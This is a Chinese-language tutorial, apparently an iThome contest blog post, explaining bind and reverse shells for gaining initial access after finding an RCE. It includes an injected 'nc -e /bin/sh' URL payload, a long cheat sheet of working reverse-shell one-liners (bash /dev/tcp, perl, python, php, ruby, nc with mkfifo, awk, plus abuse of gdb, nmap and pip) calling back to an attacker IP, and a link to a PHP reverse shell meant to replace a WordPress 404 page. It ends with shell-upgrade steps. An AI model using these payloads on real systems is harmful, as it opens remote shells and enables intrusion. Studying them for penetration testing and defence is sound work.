$nc -lvnp 1337
http://shhhhh.com/?cmd=nc%20-e%20/bin/sh%2010.0.0.1%201337
$id
root
在我們已經可以利用某個漏洞時,最期待的莫過於遇到可以RCE的洞,而我們從網站漏洞到拿到目標Server的Initial Access就是透過Bind Shell或Reverse Shell的方式。
Bind Shell
Bind shell是綁定到目標(受害者)主機上的特定port來監聽傳入連接的shell,例如:
先使用netcat將bash(sh) Shell綁定到目標主機上的1234 port
然後在攻擊者端通過這個1234 port連接到目標主機。(右方為攻擊者)
Reverse Shell
Reverse Shell則是相反
先在攻擊者(local)端監聽任何對4444 port的發起的連線,
然後讓目標主機(受害者端)對攻擊者端的4444 port發起連線。(右方為攻擊者)
兩者的差別在於,Reverse shell是從目標主機對攻擊者主機發起連線
而Bind Shell是先在目標主機上綁定特定port,然後等來自攻擊者主機對目標主機發起連線,就像後門(backdoor)一樣。
很多可以建立連線的程式語言/指令都可以用來寫Bind/Reverse Shell,依據語言特性也會有不同的寫法,甚至有些意想不到的command都可以用來寫Bind/Reverse Shell,下面列出幾個Reverse Shell:
export RHOST=10.0.0.1
export RPORT=1234
TF=$(mktemp)
echo 'local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
local r,x=t:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();' > $TF
nmap --script=$TF
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
有時為了確保目標的shell使用bash會在前面加上bash -c:bash -c `bash -i >& /dev/tcp/10.0.0.1/1234 0>&1`
export RHOST=10.0.0.1
export RPORT=1234
gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
export RHOST=10.0.0.1
export RPORT=1234
TF=$(mktemp -d)
echo 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
另一種php Reverse Shell,適合用在具有某個可以修改且運行的php網站,例如將wordpress的404.php,換成這個類型的PHP Reverse Shell,礙於篇幅,我只將Github網址貼上來:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
RHOST=10.0.0.1
RPORT=1234
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
當你成功在目標主機上或的Initial Access後,最常碰到的問題就是,無法像正常的Shell一樣好用,例如不能使用方向鍵(像是上箭頭↑的指令歷史紀錄)、倒退、clear、無法正常使用vim等等,甚至一些指令如su,ssh都要求需要一個正常的Shell才能執行。
這時候我們就可以透過一些方法來將這個shell升級成完全交互式(Fully Interactive)的TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + z
會顯示
[1]+ Stopped nc -nvlp 1234
stty raw -echo; fg
Enter
這樣就完成了,但仍然有一些問題,像是在輸入較長的指令時,會在非預期的地方換行甚至覆蓋掉原本寫的指令,非常不方便,所以需要讓這個升級過後的tty跟我們原本的terminal保持一致。
先在一個新的terminal執行:
stty -a
拿到raws跟colums的值後,在剛剛升級的tty上寫下:export TERM=xterm-256colorstty rows 32 colums 69
這樣我們就得到一個足夠好用的tty了
iThome鐵人賽
看影片追技術